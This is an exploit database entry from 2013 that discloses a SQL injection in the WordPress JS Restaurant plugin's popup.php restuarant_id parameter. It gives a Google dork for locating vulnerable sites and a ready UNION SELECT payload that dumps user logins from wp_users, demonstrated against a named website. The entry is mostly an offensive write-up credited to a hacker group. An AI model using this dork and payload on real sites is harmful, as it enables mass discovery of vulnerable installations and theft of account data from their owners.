Bug: WordPress JS Restaurant SQL Injection ( Ascii Version )

Search:
WLB2

WordPress JS Restaurant SQL Injection

Published
Credit
Risk
2013.07.09
Ashiyane Digital Security Team
Medium
CWE
CVE
Local
Remote
CWE-89
N/A ( Add )
No
Yes
 Dork: inurl:/wp-content/plugins/js-restaurant/popup.php?restuarant_id=

#############################
# Exploit Title : Wordpress JS Restaurant Plugin SQL Injection Vulnerability
#
# Author : Ashiyane Digital Security Team
#
# Security Risk : HIgh
#
# Google Dork : inurl:/wp-content/plugins/js-restaurant/popup.php?restuarant_id=
#
##############
# Location:site/[path]/wp-content/plugins/js-restaurant/popup.php?restuarant_id=[SQLi]
#
# DEm0:
#
#http://smartsXlmedia.fr/demo/restaurant/wp-content/plugins/js-restaurant/popup.php
#?restuarant_id=-2%20UNION%20SELECT%201,group_concat%28user_login%29,3,4,5,6,7,8,9,10,
#11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20wp_users--+
#
##############
# Special Tnx : Reza-S4T4n , C4t , Angel-D3m0n , Alireza666 ,...
##############
#
# Greetz to: My Lord ALLAH
#
##############
#
# bY T3rm!nat0r5
#
###########################

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version